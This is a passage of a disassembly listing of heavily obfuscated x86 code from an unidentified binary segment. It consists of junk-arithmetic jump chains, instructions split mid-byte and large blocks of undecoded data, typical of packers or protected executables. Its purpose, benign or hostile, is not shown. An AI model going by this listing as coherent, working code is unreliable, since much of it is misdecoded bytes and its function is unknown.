dd 84B472A4h, 0FFF2D7E9h, 0C30000FFh, 7D830000h, 8D0F00F8h
dd 1C0Eh, 0FFFDDCE9h, 0C300FFh, 0CF5E6857h, 0B7E90043h
db 14h, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B265
loc_43C25F: ; CODE XREF: sub_43B265:loc_43CBA1�j
add esi, 2C842861h
add eax, esi
pop esi
push edi
mov edi, offset dword_43DE90
jmp loc_43CC19
; END OF FUNCTION CHUNK FOR sub_43B265
; ---------------------------------------------------------------------------
loc_43C273: ; CODE XREF: _5qvhby1c:0043C22C�j
rol eax, 1Fh
xor eax, 0A74E6A4Dh
push ebx
mov ebx, offset byte_43C675
jmp near ptr dword_43A834+1
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
locret_43C289: ; CODE XREF: _5qvhby1c:loc_43D0F3�j
; DATA XREF: _5qvhby1c:0043D925�w
retn
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43C14F
loc_43C28B: ; CODE XREF: sub_43C14F-88A�j
jmp loc_43A066
; END OF FUNCTION CHUNK FOR sub_43C14F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BB5F
loc_43C290: ; CODE XREF: sub_43BB5F+A�j
add esi, 0E6371C55h
add esi, ebp
call sub_43AE40
; END OF FUNCTION CHUNK FOR sub_43BB5F
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43C29F: ; CODE XREF: _5qvhby1c:0043C98A�j
jmp loc_43AD8F
; ---------------------------------------------------------------------------
loc_43C2A4: ; CODE XREF: _5qvhby1c:0043D1B0�j
and ebx, 0EB238054h
xor ebx, 0EA238054h
test eax, ebx
pop ebx
jmp near ptr dword_43B39C+0Dh
; ---------------------------------------------------------------------------
dd 0C8810000h, 1054763Dh, 0DDBCC081h, 0D003AA67h, 0D87E958h
dd 0F7000000h, 2ACE83C1h, 0E4C7E990h, 0FFFFh, 0F6F04DFFh
dd 7D83FC45h, 8D0F00F0h, 4CAh, 0FFEF98E9h, 13850FFFh, 68FFFFECh
dd 0FA056317h, 0FFEFAAE9h, 0BD860FFFh, 58000003h, 0FFFDC1E9h
dd 0AD3768FFh, 68E90043h
db 0EEh, 2 dup(0FFh)
; =============== S U B R O U T I N E =======================================
sub_43C317 proc near ; CODE XREF: sub_43B7FC+1687�p
; _5qvhby1c:0043D42B�j
; FUNCTION CHUNK AT 0043DB01 SIZE 00000005 BYTES
xchg edi, [esp+0]
pop edi
call sub_43DFAB
push offset loc_43D910
jmp loc_43DB01
sub_43C317 endp
; ---------------------------------------------------------------------------
dw 3C87h
dd 0F4685F24h, 5FF44570h, 8114C7C1h, 0B73E30EFh, 0DB87E912h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
loc_43C343: ; CODE XREF: _5qvhby1c:0043A516�j
jz loc_43C0DF
add [ebx], bl
rep xor edx, 10E05651h
jmp loc_43C0DC
; ---------------------------------------------------------------------------
align 4
db 0
; ---------------------------------------------------------------------------
locret_43C359: ; CODE XREF: _5qvhby1c:0043CEE3�j
retn
; ---------------------------------------------------------------------------
jmp locret_43A268
; ---------------------------------------------------------------------------
db 68h
dd offset dword_43D540
dd 0FFE7D0E9h, 0E9EF85FFh, 9F5h, 0FA810000h, 0A5E48675h
dd 0FFDF8DE9h
db 0FFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A713
loc_43C37D: ; CODE XREF: sub_43A713+106E�j
push offset byte_43DC8B
jmp nullsub_235
; END OF FUNCTION CHUNK FOR sub_43A713
; ---------------------------------------------------------------------------
align 4
dd 24048700h, 0C015FF58h, 0E8004300h, 0FFFFEF1Dh, 0FFF64CE9h
dd 2BD6F7FFh, 0FC0F7D0h, 0E9304F1Ch, 0B61h, 59240C87h
dd 6F54C781h, 0BAE83605h, 0E9FFFFDDh, 6F8h, 30860F00h
dd 0E9000003h, 0FFFFE57Ch, 241C8700h, 74689C53h, 5B889248h
dd 0FFF267E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D51D
loc_43C3DF: ; CODE XREF: sub_43D51D:loc_43D5B3�j
pop edi
add edx, eax
rol edx, 3
loc_43C3E5: ; DATA XREF: _5qvhby1c:0043D734�o
xor edx, eax
dec ecx
jnz loc_43AA1F
call sub_43C526
mov byte ptr [edi], 9Ch
xchg ebx, [esp-4+arg_0]
mov edi, ebx
pop ebx
pop eax
sub eax, 270EC8D3h
jmp loc_43C56D
; END OF FUNCTION CHUNK FOR sub_43D51D
; ---------------------------------------------------------------------------
dd 0F9E1E900h, 0E9C3FFFFh, 0FFFFDFA4h, 0FFDD59E9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
; START OF FUNCTION CHUNK FOR sub_43B8D3
loc_43C41A: ; CODE XREF: sub_43B8D3:loc_43CE38�j
push offset dword_43DA2C
jmp nullsub_233
; END OF FUNCTION CHUNK FOR sub_43B8D3
; ---------------------------------------------------------------------------
xchg edx, eax
xchg edi, [esp]
pop edi
xchg ebp, [esp]
mov ecx, ebp
jmp loc_43C514
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BEF5
loc_43C434: ; CODE XREF: sub_43BEF5:loc_43D07E�j
add ebx, 712A9D04h
xor ebx, 41F62AFEh
xchg ebx, [esp+8+var_8]
call near ptr dword_43A3DC+16h
push ebx
mov ebx, ebp
xchg ebx, [esp+0Ch+var_C]
push offset byte_43BFEF
jmp loc_43BDAA
; END OF FUNCTION CHUNK FOR sub_43BEF5
; ---------------------------------------------------------------------------
dd 0EC48850Fh, 0A4E9FFFFh, 0FFFFEFh, 3DC2819Ch, 8794E0C3h
dd 0E9D91BEBh, 0FFFFEC30h, 24048700h, 87DA8B53h, 7AE8241Ch
dd 0FFFFE1h
; ---------------------------------------------------------------------------
loc_43C484: ; CODE XREF: _5qvhby1c:0043BDC0�j
jmp near ptr dword_43AF88+5Eh
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_43A382
loc_43C48A: ; CODE XREF: sub_43A382+10BE�j
jmp loc_43C801
; END OF FUNCTION CHUNK FOR sub_43A382
; ---------------------------------------------------------------------------
jnz loc_43CFE7
or ebp, edx
jmp loc_43D8D4
; ---------------------------------------------------------------------------
dd 0C300C600h, 0A2706858h, 0AFE90043h, 0FFFFFEh
db 0
; ---------------------------------------------------------------------------
loc_43C4AD: ; CODE XREF: _5qvhby1c:0043DA00�j
xchg esi, [esp]
mov ecx, offset loc_43C608
jmp near ptr dword_43AF54+4
; ---------------------------------------------------------------------------
align 4
cmp ecx, 335340F1h
jmp loc_43BA53
; ---------------------------------------------------------------------------
align 4
db 0, 89h, 6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D51D
loc_43C4CB: ; CODE XREF: sub_43D51D:loc_43C56D�j
; sub_43D51D-103C�j
call near ptr dword_43B210+0Dh
adc ebx, edx
adc esi, 0C60AC9F2h
xor edx, 19733E6Ah
loc_43C4DE: ; DATA XREF: _5qvhby1c:0043B4A9�o
rcl ch, 0E8h
jnp short near ptr loc_43C4CB+4
; END OF FUNCTION CHUNK FOR sub_43D51D
; ---------------------------------------------------------------------------
db 0FFh
; ---------------------------------------------------------------------------
inc dword ptr [eax]
retn
; ---------------------------------------------------------------------------
align 4
loc_43C4E8: ; CODE XREF: _5qvhby1c:0043BEF0�j
jmp loc_43BA60
; ---------------------------------------------------------------------------
align 2
locret_43C4EE: ; CODE XREF: _5qvhby1c:0043B1FA�j
retn
; ---------------------------------------------------------------------------
align 10h
loc_43C4F0: ; CODE XREF: _5qvhby1c:0043DA74�j
jmp locret_43CB32
; ---------------------------------------------------------------------------
align 2
jmp loc_43AA1F
; ---------------------------------------------------------------------------
align 4
loc_43C4FC: ; CODE XREF: _5qvhby1c:0043C0AE�j
jmp near ptr byte_43ADDD+2
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_43A7DE
loc_43C502: ; CODE XREF: sub_43A7DE+8�j
jmp loc_439FF7
; END OF FUNCTION CHUNK FOR sub_43A7DE
; ---------------------------------------------------------------------------
align 4
dd 0A6C18100h, 0E9F3251Eh, 0FE4h
; ---------------------------------------------------------------------------
loc_43C514: ; CODE XREF: _5qvhby1c:0043C42F�j
pop ebp
popf
mov al, [eax]
sub al, 99h
push 41CC3A08h
jmp near ptr dword_43B4E4+16h
; ---------------------------------------------------------------------------
db 2 dup(0)
; =============== S U B R O U T I N E =======================================
sub_43C526 proc near ; CODE XREF: sub_43D51D-112F�p
xchg ebx, [esp+0]
pop ebx
push esi
mov esi, edi
xchg esi, [esp+0]
jmp near ptr dword_43AE90+36h
sub_43C526 endp
; ---------------------------------------------------------------------------
align 2
word_43C536 dw 487h ; DATA XREF: sub_439E68�o
dd 240C8724h, 5359C18Bh, 43C76268h, 0E023E900h, 0FFFFh
dd 680000C3h, 1D68CB18h, 50E18159h, 81AE5BC9h, 0AB1D83F1h
dd 0E5C18112h, 0E9E15FF1h, 7DDh
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43D51D
loc_43C56D: ; CODE XREF: sub_43D51D-111A�j
js loc_43C4CB
; END OF FUNCTION CHUNK FOR sub_43D51D
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43C574: ; CODE XREF: sub_43B7F1+1985�j
jmp loc_43CB3D
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
db 2 dup(0), 1Bh
dd 0F7338BCDh, 0E9DE8BD3h, 0FFFFFF41h
db 2 dup(0)
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_242. PRESS KEYPAD "+" TO EXPAND]
db 0C6h
dd 685AFF02h, 0E3E85C9Ah, 0E25BE958h, 0C581FFFFh, 0AB9085Eh
dd 8B241487h, 29E95ACAh, 68FFFFDDh, 0EA3F6E41h, 0D96E9h
dd 0D5810000h, 4C1C41ADh, 0FFF336E9h
db 0FFh, 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A948
loc_43C5C3: ; CODE XREF: sub_43A948+1D9A�j
mov eax, ebx
pop ebx
push edx
pop ecx
xchg ecx, [esp-8+arg_4]
push edi
jmp loc_43B9CA
; END OF FUNCTION CHUNK FOR sub_43A948
; ---------------------------------------------------------------------------
db 0BAh, 0C6h, 0F2h
; ---------------------------------------------------------------------------
sbb [ecx+ebp*8-1E73h], edx
add [edi], cl
or byte ptr [eax+7], 0
add [ebx], dl
retn 1C87h
; ---------------------------------------------------------------------------
dw 5B24h
dd 0F309E89Dh, 6800FFFFh, 33CA348Fh, 0FFF337E9h, 8B0000FFh
dd 15F5E91Ah, 0
; ---------------------------------------------------------------------------
loc_43C604: ; DATA XREF: _5qvhby1c:0043DD88�o
setalc
mov byte ptr [eax], 5Dh
loc_43C608: ; DATA XREF: _5qvhby1c:0043C4B0�o
or eax, [ebp-8Ch]
mov eax, [ebp-8Ch]
call sub_43B30A
jmp loc_43AD2C
; ---------------------------------------------------------------------------
align 10h
loc_43C620: ; CODE XREF: _5qvhby1c:0043CBD8�j
and eax, 401C6DEDh
loc_43C626: ; CODE XREF: _5qvhby1c:loc_43AD2C�j
jz loc_43B3CB
jmp loc_43A8AC
; ---------------------------------------------------------------------------
align 2
shr ebp, 9
jmp loc_43CCA3
; ---------------------------------------------------------------------------
dw 8100h
dd 0F5DD04FFh, 0FF96E9E6h, 0DD03FFFFh, 0DD18C381h, 1B8B7560h
dd 241C879Dh, 0FFEF41E8h, 0C6C300FFh, 4878703h, 58D88B24h
dd 0FFD73DE9h, 8B03C6FFh, 81C5035Bh, 0B395A3C0h
db 48h
byte_43C675 db 69h, 0, 9Dh ; DATA XREF: _5qvhby1c:0043C27D�o
dd 0E0055494h, 0FFF7E0E9h, 0DF8B53FFh, 0BF241C87h, 439E16h
dd 0C60E9h, 0F07C600h, 0F35EE85Fh, 0FFFFh, 0FFDC01E9h
dd 0D4E999FFh, 0FFFFE0h, 96FE800h, 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A948
loc_43C6B0: ; CODE XREF: sub_43A948+124D�j
jmp loc_43DA51
; END OF FUNCTION CHUNK FOR sub_43A948
; ---------------------------------------------------------------------------
loc_43C6B5: ; DATA XREF: sub_43A948:loc_43A7D1�o
jmp loc_43B0ED
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_43A948
loc_43C6BC: ; CODE XREF: sub_43A948+16FF�j
mov eax, [eax]
call sub_43CCA4
add bl, al
add cl, ch ; CODE XREF: _5qvhby1c:0043CCE7�j
jge short loc_43C6E0
; END OF FUNCTION CHUNK FOR sub_43A948
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43C6CB: ; CODE XREF: _5qvhby1c:0043B6F2�j
jmp loc_43BDB1
; ---------------------------------------------------------------------------
dd 0FFDE0BE9h, 9D01C6FFh, 8B243C87h, 87595FCFh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A948
loc_43C6E0: ; CODE XREF: sub_43A948+1D7F�j
sbb al, 24h
jmp loc_43C5C3
; END OF FUNCTION CHUNK FOR sub_43A948
; ---------------------------------------------------------------------------
align 4
dd 4EE95500h, 87FFFFE5h, 80B9241Ch, 0E90043A9h, 13C2h
dd 0FB810000h, 8AA4F771h, 0F4BE9h, 0FA7AE800h, 8500FFFFh
dd 0E8A1E9FBh, 0F281FFFFh, 0D66076BCh, 5BFFA81h, 73E92FEDh
dd 0FFFFF6h, 24048700h, 0E99C9D58h, 0FFFFE26Bh, 0C2F70000h
dd 0FEBFB6D0h, 166E9h, 0EB810000h, 5E1128A4h, 8116C3C1h
dd 32022FF3h, 12C3C185h, 0E612F381h, 9FE9033Eh, 0C3000011h
dd 0C4BB0000h, 0E90043B4h, 0FFFFF668h, 0C30000h, 0F6CEE900h
dd 0FFFFh, 8C89C281h, 15E99066h, 1, 8B11DEB8h, 0F1D9E945h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B845
loc_43C78F: ; CODE XREF: sub_43B845:loc_43AF82�j
push edx
mov edx, ebp
xchg edx, [esp+0]
mov ebp, esp
add esp, 0FFFFFFE0h
jmp loc_43CDB2
; END OF FUNCTION CHUNK FOR sub_43B845
; ---------------------------------------------------------------------------
db 0E8h
dd 0BA7h
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B655
loc_43C7A5: ; CODE XREF: sub_43B655+BA�j
jmp near ptr dword_439ECC+2Bh
; END OF FUNCTION CHUNK FOR sub_43B655
; ---------------------------------------------------------------------------
dw 6800h
dd offset dword_43BDC8+50h
dd 0FFFC5FE9h
db 0FFh
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_241. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
push 43BAC3h
jmp loc_43D99D
; ---------------------------------------------------------------------------
dd 850F0000h, 5FDh, 0FFFF08E9h, 8E0F00FFh, 724h, 5E6E9h
dd 0F000000h, 0FFD98A8Bh
db 0FFh
; ---------------------------------------------------------------------------
loc_43C7E1: ; CODE XREF: _5qvhby1c:loc_43DF28�j
sub esi, 0FB36542Ch
push edi
mov edi, offset loc_43D9A9
jmp loc_43A37B
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
locret_43C7F3: ; CODE XREF: _5qvhby1c:loc_43B023�j
retn
; ---------------------------------------------------------------------------
dd 0FBD3E900h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
loc_43C7FB: ; CODE XREF: _5qvhby1c:0043A304�j
jmp loc_43B829
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A382
loc_43C801: ; CODE XREF: sub_43A382:loc_43C48A�j
cmp eax, 0E59761D0h
jmp loc_43C21E
; END OF FUNCTION CHUNK FOR sub_43A382
; ---------------------------------------------------------------------------
db 0
; =============== S U B R O U T I N E =======================================
sub_43C80D proc near ; CODE XREF: _5qvhby1c:0043D863�p
xchg esi, [esp+0]
pop esi
mov ecx, 0Ah
cdq
idiv ecx
mov [ebp-8], eax
inc dword ptr [ebp-10h]
push 43B071h
jmp near ptr byte_43B061+2
sub_43C80D endp
; ---------------------------------------------------------------------------
pushf
push offset dword_43B39C
jmp locret_43D383
; ---------------------------------------------------------------------------
dd 0C4C08100h, 873F348Ch, 815F243Ch, 7A1061C3h, 0E91B8BF5h
dd 0FFFFFFA9h, 0E9C5D100h, 0FFFFE2BBh, 1E560000h, 43AAA068h
dd 0D603E900h, 0FFFFh, 598701C6h, 1418D68Bh, 5A515224h
dd 0FFE748E8h, 500000FFh
; ---------------------------------------------------------------------------
mov eax, esi
loc_43C87A: ; CODE XREF: _5qvhby1c:loc_43A650�j
xchg eax, [esp]
push 0F3ECAF3Ah
pop esi
and esi, 15627D96h
rol esi, 7
sub esi, 0DC11894Ah
jmp near ptr dword_43A5AC+6Ch
; ---------------------------------------------------------------------------
align 4
dd 878902C6h, 0D08B2404h, 0DCC1E958h, 0F00FFFFh, 0FFECAF83h
dd 241C87FFh, 8B243487h, 45FF5EDEh, 0AEFA68FCh, 66E90043h
dd 0FFFFE1h, 0CE20BE00h, 0CF811847h, 0FEF1055Bh, 0FFE3E8E9h
dd 0C10000FFh, 56E90FC8h, 0FFFFFFh, 0FEAF840Fh
db 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_43C8E6: ; CODE XREF: _5qvhby1c:loc_43DF63�j
xor edx, 5B772ACAh
add edx, ebp
add edx, 25111440h
loc_43C8F4: ; DATA XREF: _5qvhby1c:0043D9E7�o
mov word ptr [edx], ss
push esi
mov esi, edi
jmp near ptr dword_439DF4+5Fh
; ---------------------------------------------------------------------------
align 10h
retn
; ---------------------------------------------------------------------------
align 2
dw 18E9h
dd 0FFFFD6h
db 0
; ---------------------------------------------------------------------------
locret_43C909: ; CODE XREF: _5qvhby1c:0043D357�j
retn
; ---------------------------------------------------------------------------
db 0
byte_43C90B db 0FFh ; DATA XREF: _5qvhby1c:loc_43D352�o
dd 7D83F04Dh, 8C0F00F0h, 0FFFFE971h, 1262E9h
db 3 dup(0)
; ---------------------------------------------------------------------------
loc_43C91F: ; CODE XREF: _5qvhby1c:0043B9D6�j
jg near ptr dword_43B8F8+89h
cdq
js loc_43E0C6
sub esi, 0F38684F0h
loc_43C932: ; CODE XREF: _5qvhby1c:loc_43B9C4�j
and edx, 0EBF0FBF5h
add edx, 5628C862h
test edx, 80000000h
jmp loc_43DF63
; ---------------------------------------------------------------------------
align 2
dw 1487h
dd 0F5035A24h, 0C594C681h, 368B3F2Eh, 0E8243487h, 0FFFFFA29h
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DACC
loc_43C960: ; CODE XREF: sub_43DACC-30A8�j
jmp nullsub_226
; END OF FUNCTION CHUNK FOR sub_43DACC
; ---------------------------------------------------------------------------
db 2 dup(0), 1Bh
; ---------------------------------------------------------------------------
stc
jmp loc_43DCDE
; ---------------------------------------------------------------------------
loc_43C96E: ; CODE XREF: _5qvhby1c:loc_439E60�j
xor ecx, 0C956D10h
and ecx, 0E1FD959Eh
push edi
push 6438515h
pop edi
rol edi, 16h
sub edi, 2C78FC53h
jmp loc_43C29F
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
retn
; ---------------------------------------------------------------------------
align 2
push edi
push offset dword_43BC30
jmp locret_43BC28
; ---------------------------------------------------------------------------
align 2
xchg edi, [esp]
pop edi
xchg edx, [esp]
mov ebp, esp
push edi
mov edi, ebx
xchg edi, [esp]
push 1D4F3026h
jmp loc_43BA4E
; ---------------------------------------------------------------------------
db 85h
dd 0FF22E9F5h, 0C300FFFFh, 68500000h, 0F231A5BCh, 26C08158h
dd 818766CBh, 52094FC8h, 6FC081B7h, 0E9006942h, 0FFFFF275h
dd 0DAD58100h, 873DA1C9h, 8B5E2434h, 4DE89D00h, 0E8000013h
dd 0FFFFE1C7h, 0BE850F00h, 0FFFFEDh, 0EAF1819Ch, 0C113698Dh
dd 0C5E90FE2h
db 13h, 2 dup(0)
; ---------------------------------------------------------------------------
loc_43CA0F: ; CODE XREF: _5qvhby1c:0043BA46�j
jnz loc_43B388
add cl, ch
adc esi, eax
; ---------------------------------------------------------------------------
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
jb loc_43CD2B
jmp loc_43B377
; ---------------------------------------------------------------------------
popf
and edx, eax
jmp loc_43DD40
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_228. PRESS KEYPAD "+" TO EXPAND]
dd 0BECC6800h, 0FBE90043h, 0FFFFD7h, 0E5EDE781h, 487FEF3h
dd 68525824h, 0DC1C2379h, 0FFF06DE9h, 0F88500FFh, 20BE9h
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BFFD
loc_43CA5A: ; CODE XREF: sub_43BFFD:loc_43DAE8�j
mov byte ptr [ecx], 8Bh
pop ecx
add eax, ebp
add eax, 32D32F61h
jmp near ptr dword_43AC30+2Ch
; END OF FUNCTION CHUNK FOR sub_43BFFD
; ---------------------------------------------------------------------------
align 4
dd 9C01C600h, 43DB4468h, 0F4D1E900h, 8B00FFFFh, 0E6DEE913h
dd 0C759FFFFh, 1FC45h, 8B520000h, 241487D3h, 439DAABBh
dd 0D7B2E900h, 6891FFFFh, 1544F70Ch, 8B243487h, 0C9815ECEh
dd 97D03424h, 8C5CF981h, 0D8E9C2D8h, 0Ah, 598D01C6h, 8B241487h
dd 0C18B50ECh, 7FAE9h, 0F000000h, 0FFE71289h, 0BE2987FFh
dd 81C2EA5Dh, 0FFFD4CE9h
; ---------------------------------------------------------------------------
inc dword ptr [eax]
loc_43CADE: ; DATA XREF: sub_43DF7B:loc_43A03C�o
add dh, al
pop es
mov [edi-274DBD4h], eax
pop ebp
rol edi, 3
add edi, 843F7C00h
sub edi, 9EA01C21h
rol edi, 7
jmp loc_43D2FC
; ---------------------------------------------------------------------------
align 10h
dd 241C8700h, 27657168h, 0F7815FDBh, 0A2C9629Eh, 1108E9h
dd 2B000000h, 0C3DE9C5h, 0
dd 0E72850Fh, 0
dd 0E9338B52h, 0FFFFD5B4h
db 2 dup(0)
; ---------------------------------------------------------------------------
locret_43CB32: ; CODE XREF: _5qvhby1c:loc_43C4F0�j
retn
; ---------------------------------------------------------------------------
push 43A343h
jmp locret_43D7D7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43CB3D: ; CODE XREF: sub_43B7F1:loc_43C574�j
jnz loc_43CBF5
jmp loc_43D02A
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
dword_43CB48 dd 0FA810000h, 0BF8D5F4Eh, 0FFEA3FE9h, 81C300FFh, 0AA0113C0h
dd 9D007D73h, 34C1E58Bh, 5EEE8B24h, 0FFF6D2E9h, 870000FFh
dd 0C65B241Ch, 0AC590101h, 759E9h, 0E9CE2B00h, 0FFFFFDC6h
dd 0C6A96800h, 90E90043h, 0C6FFFFE2h, 70E89C01h, 0Eh, 0EEF3E900h
dd 0C300FFFFh
db 0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B265
loc_43CBA1: ; CODE XREF: sub_43B265+14�j
jmp loc_43C25F
; END OF FUNCTION CHUNK FOR sub_43B265
; ---------------------------------------------------------------------------
align 4
shl esi, 3
jmp sub_43D6F8
; ---------------------------------------------------------------------------
dd 0E7840F00h
db 0E3h, 2 dup(0FFh)
; ---------------------------------------------------------------------------
loc_43CBB7: ; CODE XREF: _5qvhby1c:0043CD78�j
jmp loc_43DE82
; ---------------------------------------------------------------------------
dd 0CEC10000h, 0D78C0F16h, 0C1FFFFEDh, 0CFE919CDh, 0FFFFE3h
db 0
; ---------------------------------------------------------------------------
loc_43CBD1: ; CODE XREF: _5qvhby1c:0043AD32�j
mov ecx, 632D2B11h
sub edi, ebx
jmp loc_43C620
; ---------------------------------------------------------------------------
align 2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_230. PRESS KEYPAD "+" TO EXPAND]
align 10h
dd 0F727E900h
db 2 dup(0FFh), 0
; ---------------------------------------------------------------------------
locret_43CBE7: ; CODE XREF: _5qvhby1c:0043AB69�j
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F1
loc_43CBEA: ; CODE XREF: sub_43B7F1+183B�j
or eax, esi
jge loc_43AD45
mov esi, [ebp+0]
loc_43CBF5: ; CODE XREF: sub_43B7F1:loc_43CB3D�j
call loc_43BCDC
; END OF FUNCTION CHUNK FOR sub_43B7F1
; ---------------------------------------------------------------------------
dw 0
dd 6805CDC1h, 6B76EC8Ch, 0FFF7A3E9h, 810000FFh, 671DD6CFh
dd 0EC29E91Ah, 0FFFFh
; ---------------------------------------------------------------------------
locret_43CC18: ; CODE XREF: _5qvhby1c:0043A520�j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B265
loc_43CC19: ; CODE XREF: sub_43B265+1009�j
jmp loc_43C127
; END OF FUNCTION CHUNK FOR sub_43B265
; ---------------------------------------------------------------------------
align 10h
dd 6C0FF081h, 0C5C9E272h, 1FE6C081h, 689DD55Fh, 43A995h
dd 0FFDE0FE9h, 0EB81C3FFh, 93ED082Fh, 2190C381h, 1C87306Eh
dd 0DC84E924h, 0FFFFh, 0E17B3968h, 2414877Dh, 0D15AC28Bh
dd 0DEF1E9C0h, 0FFFFh, 88E810Fh, 0E91B0000h, 5A241487h
dd 0D2C6B951h, 40E90043h, 0FFFFF7h, 0C16B6800h, 0C15A7DF5h
dd 0C2810CC2h, 0A42CEFB3h, 0E92414E0h, 0FFFFE382h, 0F7685252h
dd 0E91990B7h, 0FFFFF171h
db 2 dup(0), 0C3h
; ---------------------------------------------------------------------------
loc_43CCA3: ; CODE XREF: _5qvhby1c:0043C635�j
popf
; =============== S U B R O U T I N E =======================================
sub_43CCA4 proc near ; CODE XREF: sub_43A948+1D76�p
; FUNCTION CHUNK AT 0043DF42 SIZE 00000005 BYTES
push offset byte_43BB2B
jmp loc_43DF42
sub_43CCA4 endp
; ---------------------------------------------------------------------------
loc_43CCAE: ; CODE XREF: _5qvhby1c:0043D2BE�j
mov byte ptr [ecx], 3
pop ecx
pop eax
sub eax, 0BC1B6EFFh
xor eax, 0DCEBBDF9h
loc_43CCBF: ; DATA XREF: _5qvhby1c:0043D2B9�o
mov ah, 0C5h
jmp loc_43D85B
; ---------------------------------------------------------------------------
align 4
retn
; ---------------------------------------------------------------------------
db 2 dup(0)
db 0E9h ;
db 87h ;
db 0E1h ;
db 0FFh
db 0FFh
dd 0FFD9D5E9h, 9ABF57FFh, 0E90043CAh, 0E99h
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43CCE2: ; CODE XREF: _5qvhby1c:loc_43CD72�j
; _5qvhby1c:0043DE88�j
push offset dword_43DE50
jmp near ptr loc_43C6C5+1
; ---------------------------------------------------------------------------
pop ecx
rol ecx, 1Fh
xor ecx, 0E142C961h
rol ecx, 19h
or ecx, 3DFDB6A4h
add ecx, 4245DAE7h
jmp loc_43D451
; ---------------------------------------------------------------------------
dw 9C59h
dd 0B5659668h, 0E08158C0h, 6B03AE3Eh, 8102C0C1h, 0D23E67E8h
dd 0E919E982h, 487FFFFh
; ---------------------------------------------------------------------------
and al, 58h
push edx
loc_43CD2B: ; CODE XREF: _5qvhby1c:0043CA1C�j
pop ss
push 43BBE4h
jmp locret_43D1E4
; ---------------------------------------------------------------------------
dw 6800h
dd offset dword_43BDC8+1Bh
dd 0FFF053E9h
db 0FFh
; ---------------------------------------------------------------------------
loc_43CD41: ; CODE XREF: _5qvhby1c:0043DA7F�j
jz loc_43CF13
; ---------------------------------------------------------------------------
db 0
dd 0ED4BE900h, 0FFFFh
; ---------------------------------------------------------------------------
loc_43CD50: ; CODE XREF: _5qvhby1c:0043A08C�j
jmp locret_43BDA7
; ---------------------------------------------------------------------------
db 2 dup(0), 87h
dd 0F63FE92Fh, 0C300FFFFh, 2CDE9h, 50850F00h, 23000003h
dd 830E9EAh
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_43CD72: ; CODE XREF: _5qvhby1c:0043C02D�j
jl loc_43CCE2
jmp loc_43CBB7
; ---------------------------------------------------------------------------
align 2
dw 800Fh
dd 0FFFFDF8Ch, 58240487h, 4C4F081h, 4870802h
db 24h
byte_43CD91 db 6Bh, 15h, 0C0h ; DATA XREF: sub_43BEF5+B�o
dd 0E9004300h, 0FFFFDD67h, 0EB130000h, 0FFD7F7E9h, 870000FFh
dd 0FDC1E913h, 0FFFFh
; ---------------------------------------------------------------------------
locret_43CDB0: ; CODE XREF: _5qvhby1c:0043D22B�j
retn
; ---------------------------------------------------------------------------
align 2
; START OF FUNCTION CHUNK FOR sub_43B845
loc_43CDB2: ; CODE XREF: sub_43B845+F55�j
jmp loc_43A623
; END OF FUNCTION CHUNK FOR sub_43B845
; ---------------------------------------------------------------------------
align 4
jmp loc_43D309
; ---------------------------------------------------------------------------
db 2 dup(0), 0Fh
dd 0FFE46283h, 87C181FFh, 81C995B5h, 9EBDE6F1h, 0D31DE810h
dd 0FFFFh, 0CD66C081h
db 3Bh, 8Eh
dw 468h
dd 0EDB6E924h, 8D00FFFFh, 43A27805h, 0A2800F00h, 56FFFFD9h
